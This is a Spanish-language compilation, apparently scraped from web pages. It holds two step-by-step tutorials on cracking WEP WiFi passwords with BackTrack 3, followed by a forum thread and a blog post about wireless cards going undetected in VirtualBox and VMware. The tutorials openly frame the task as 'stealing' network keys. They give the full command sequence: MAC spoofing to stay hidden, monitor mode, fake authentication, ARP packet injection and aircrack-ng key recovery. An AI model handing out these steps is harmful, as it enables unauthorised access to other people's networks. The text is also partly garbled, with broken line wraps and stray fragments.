Como sacar o "robar" contraseñas WiFi

con Backtrack 3

El día de hoy, vamos a ver como sacar contraseñas WiFi, en este caso una contraseña
con encriptación WEP.

1. Lo primero que debemos hacer es descargar Backtrack 3. Descagar Aquí

2. Luego grabamos la imagen en un CD, para esto podemos utilizar un programa
gratuito como ISO recorder 2.0. Descargar Aquí

3. Una vez con el cd grabado, reiniciamos el computador y ponemos el cd para que

arranque BackTrack 3.
4. Luego abrimos una consola (shell) con el icono que está al lado de la “K” de la
esquina inferior izquierda.
5. Detenemos nuestra tarjeta de Red (En este caso una Atheros por lo tanto es
ath0)
Escribimos: airmon-ng stop ath0

6. Para continuar, cambiamos nuestra MAC (Media Access Control), para ser
“ocultados”.
Escribimos: macchanger -m 11:22:33:44:55:66 wifi0
7. Iniciamos nuestra tarjeta de Red en modo Monitor.
Escribimos: airmon-ng start wifi0

8. Ahora nos aseguraremos que todo vaya bien, revisaremos la MAC cambiada y
que la tarjeta esté en modo Monitor.
Escribimos: iwconfig

9. Ahora, a revisar si hay redes cerca nuestro.

Escribimos: airodump-ng wifi0
10. Anotemos datos muy importantes de la pantalla anterior, como lo son:
o La MAC de la red (BSSID)
o El canal por donde se transmite la red WiFi (CH)
o El nombre de la red (ESSID)
11. Presionamos CTRL+C y así se detendrá la búsqueda de redes cercanas.
Luego escribimos: airodump-ng –channel X –write XXX ath0
x= Canal (CH)
xxx= Nombre para guardar el archivo con información, pongan cualquier
nombre, en este caso “pass”

Para este ejemplo sería: airodump-ng –channel 5 –write pass ath0

12. Ahora abrimos otra ventana de consola (Shell).

Escribimos lo siguiente: aireplay-ng -3 -b (mac de la red) -h (nuestra mac) ath0

13. Volvemos a abrir otra ventana de consola (Shell)

Ahora escribimos: aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (nuestra mac) ath0
 14. Ahora debemos esperar a que se obtenga la información suficiente como para
saber la contraseña de la red, para esto tenemos que esperar a que los ARP sean
altos (más de 50.000).
15. Una vez que tengamos suficiente información (lo sabrás con experiencia,
muchos intentos, todo depende de la dificultad de la contraseña), cancelamos lo
que teníamos andando presionando CTRL+C en cada consola (Shell).
16. Luego iniciamos otro programa para que desencripte la contraseña.
Escribimos: Aircrack-ng pass-01.cap

Finalmente, ya tenemos la contraseña de la red. BackTrack 3 ha funcionado.

Aclaraciones: Debido a problemas con mi máquina virtual, no he podido poner mis

propias imágenes, agradezco este tutorial encontrado en Internet. A pesar de que no son
mis imágenes, si he hecho estos pasos pero con una tarjeta Ralink.

Cualquier duda que tengan, escríban aquí, les ayudaremos con todo.
Saludos!
 Crackear una red wifi con
Backtrack 3
Hoy vamos a aprender a desencriptar las contraseñas de los puntos de red wifi protegidos, usaremos
una distro de GNU/Linux llamada Bactrack 3 y una computadora portatil.

Sugiero que  prueben esta guía en su maquina y cuenten como les funciono…

*Update*

Aquí pueden ver una lista de compatibilidad de Laptops

Y aquí una de Tarjetas Wireless

Que es lo que necesitamos?

Para que se nos haga mas fácil, vamos a usar Backtrack 3 versión USB, la podemos encontrar aquí,
Backtrack 3.

Al descomprimirlo, vamos a ver dos folders, los copiamos al root de nuestra memoria usb (ej. E:/)
luego lanzamos el command prompt (Inicio / ejecutar / cmd) dentro de la terminal navegamos hasta
nuestra memoria usb, en este caso tecleamos e: y le damos enter.

Tecleamos cd boot para ir a este folder dentro de nuestra memoria, estando ahi adentro tecleamos
bootinst.bat seguimos las instrucciones y luego de esto ya podemos arrancar con nuestra distro de
bactrack.

Ahora al reiniciar la computadora, presionamos el boton para seleccionar de donde arrancar (Varia
con cada computadora, lee el manual de usuario) y seleccionamos la memoria usb.
Ya dentro del sistema operativo, se darán cuenta (Para los que no han usado linux) de que es similar
a Windows.

Vamos con la parte principal.

Para abrir una presionamos el cuadrado negro que esta al lado del “menu de inicio”.

En una terminal ponemos:

airmon-ng start wifi0 (Ojo, es un cero no una “O”)

Después de esto ponemos:

airodump-ng eth1

Cuando encuentres tu red wifi ctrl+c para parar la búsqueda y escribimos:

airodump-ng -c [channel] –bssid [AP MAC] -w [filename] eth1

donde(no hay que poner corchetes):

[channel] es el canal
[AP MAC] es la dirección mac, XX:XX:XX:XX:XX
[filename] el nombre de archivo que le quieres dar, por ejemplo “casa”, muy importante no olvidar
esto.

Después de esto, abrimos una nueva terminal y escribimos lo siguiente

aireplay-ng –fakeauth 0 -e [AP SSID] -a [AP MAC] eth1

donde:

[AP SSID] es el nombre del Punto de acceso: Por ejemplo WLANCASA o lo que salga ahi en la
primera terminal.

Si nos sale lo siguiente, vamos muy bien:

18:18:20 Sending Authentication Request

18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful

Si no, probaremos con este comando:

Aireplay-ng –fakeauth 6000 -o 1 -q 10 -e [AP SSID] -a [AP MAC] eth1

(Si usamos esta segunda opcion, el siguiente paso lo haremos en una terminal nueva)

Y deberíamos de obtener algo asi:

18:22:32 Sending Authentication Request

18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet
Si no nos funciona, no podremos seguir trabajando con esa red, repasa los pasos, algo hiciste mal.

Ya vamos dentro, empezamos con la etapa de inyección.

En la terminal escribimos

aireplay-ng -3 -b [AP MAC] eth1 -x 250

Esto va a tomar un rato, veras como la columna de numeros empieza a moverse.

Espera hata tener unos 40.000 más o menos (o puedes esperar unos 5 minutos) y abre una tercera
terminal.

aircrack-ng -z -b [AP MAC] [filename*.cap]

En filename ponemos el nombre del archivo que usamos antes, en este caso seria casa.cap

En unos momentos aparecerá la clave, la apuntamos en un papel, reiniciamos con nuestro sistema
preferido y ya tenemos acceso a la red…

Saludos.

hola a todos necesito saber como puedo configurar en mi backtrack mi tarjeta

inalambrica atheros para reconocerlo

En línea

drico14 Re: no me reconoce mi tarjeta de red wifi en BACKTRACK

con vware

Desconecta « Respuesta #1 en: 5 Noviembre 2010, 16:59 »

do

Mensajes: 1
hola buen dia, espero lo que te voy a decir aqui te sirva.

yo estuve realizando pruebas de wifi hacking y necesite utilizar lo que

tu estas plantenado aqui. intente con maquinas virtuales como virtual
box, vmware y ellas directamente con una imagen iso del back track
no me reconocen las tarjetas inalambricas la unica salida que encontre
fue....

1. me consegui un cd de back track 4 boteable.

2. configure mi maquina para que cuando arrancara, arrancar primero
la unida de cd.
3. cuando arranco el back track 4 lo inicie con la opcion 4.
4. una vez arranco le di el comando iwconfig y que buena suerte me
habia reconocido las tarjetas inalambricas la de mi portatil y una
 externa que le habia conectado.

lo que sucede es que al parcer las maquinas virtuales las tarjetas wifi
las reconoce como ethernet y se vas a realizar inyeccion de paquetes
debes hacerlo cono tarjetas wifi.

espero hubiera sido de utilidad esta vivencia.  Exitos fijo le sale,

llevava una semana en esa vuelta.

En línea

alcon121 Re: no me reconoce mi tarjeta de red wifi en BACKTRACK

con vware

Desconecta « Respuesta #2 en: 24 Noviembre 2010, 17:06 »

do

Mensajes: 20
OK gracias.
Te cuento que lo inente de esa forma tambien, el problema es:

- con vware me reconoce bien menos la tarjea de red inalambrica,

pero cuando ago ping a una de las maquinas conectadas da bien, esto
lo utilice para exploits y otras cosas mas, pero ahora quiero capturar
una calve wifi y hago:
iwconfig no me reconoce mi tarjeta de red.

- hice arrancar mi backtrack 4 mediante USB con el uneboot (creo que

se escribe asi) y reconoce bien cuando hago iwconfig, pero cuando
hago ping a una de las maquinas conectadas y no resultado.

quisiera saber como configurar esa parte en el backtrack 4 para la

primera o sengunda forma para trabajar bien........
un saludo

En línea

Re: no me reconoce mi tarjeta de red wifi en BACKTRACK

con vware

« Respuesta #3 en: 24 Noviembre 2010, 21:16 »

si tu tarjeta es PCI no va  funcionar con ninguna maquina virtual.

Graba la iso en un CD o pendrive y botealo y deberia reconocerlo

http://foro.elhacker.net/wireless_en_linux/no_me_reconoce_mi_tarjeta_de_red_wifi_en_bac
ktrack_con_vware-t309773.0.html#ixzz1Hr9Ciku0

21DIC/105

VirtualBox

no

reconoce mi

ta

rjeta de

red /

wifi

Tras el post sobre cómo instalar BackTrack 4 en VirtualBox se produjeron comentarios

de muchos de vosotros con un mismo tema recurrente relacionado con el
reconocimiento de las tarjetas de red, más concretamente con la tarjeta wifi.

En uno de los comentarios se explicaba el porqué de que VirtualBox (o VMWare) no

reconociera las tarjetas wifi como tarjetas inalámbricas, pero creo que no quedó claro
del todo. Este es el porqué de este post.

El entorno de virtualización, en este caso VirtualBox (aplicable a VMWare también),

sí reconoce las tarjetas de red
instaladas en el sistema anfitrión y tiene acceso a ellas. Entonces, ¿Por qué la
BackTrack (o cualquier huésped) no me las detecta de la misma forma?

El motivo es que el sistema de virtualización crea una interfaz virtual por cada
interfaz física, que son las que detecta el sistema virtualizado (puede haber más,
pero de forma predeterminada es así). Además hace una correspondencia interna
entre cada interfaz virtual y física para saber donde ha de enviar la información
que recibe en las interfaces virtuales. Esta correspondencia solo es capaz de hacerla
simulando tarjetas Ethernet, de cara al sistema virtualizado. Por tanto, tengas las
interfaces que tengas (wifi, otras Ethernet, modem…) las "convertirá" en
interfaces Ethernet. Recalcar que esto solo lo hace aquellas interfaces tipo PCI
y PCI-E (o cualquier otra conectada directamente a la placa base).

Por este motivo si lo que queréis es tener una tarjeta wireless en la maquina virtual
(probablemente para hacer maldades) tendréis que enchufar una USB, PCMCIA o
ExpressCard y asignarla a la maquina virtual. En la imagen se muestra cómo:

Una vez hecho esto BackTrack os la detectará sin mayores problemas. Lo podéis
comprobar haciendo un dmeg:
  

También han habido varias dudas con temas de drivers. Si hecho lo anterior no
funciona, y seguís sin ver vuestra tarjeta de red, la única solución es buscar los drivers
en el aptitude, bajártelos y compilarlos o recompilar los drivers del kernel e incluir el de
tu tarjeta (sino lo estuviera ya).

Publicado por Dani

Etiquetado con: backtrack 4, maquina virtual backtrack no reconoce tarjeta de red, network, red,
virtualbox, vmware Deja un comentario
Comentarios (5) Trackbacks (1) ( suscribirse a los comentarios de esta entrada )

1.

2.

3.

4.

5.
1.

2.

3.

4.

5.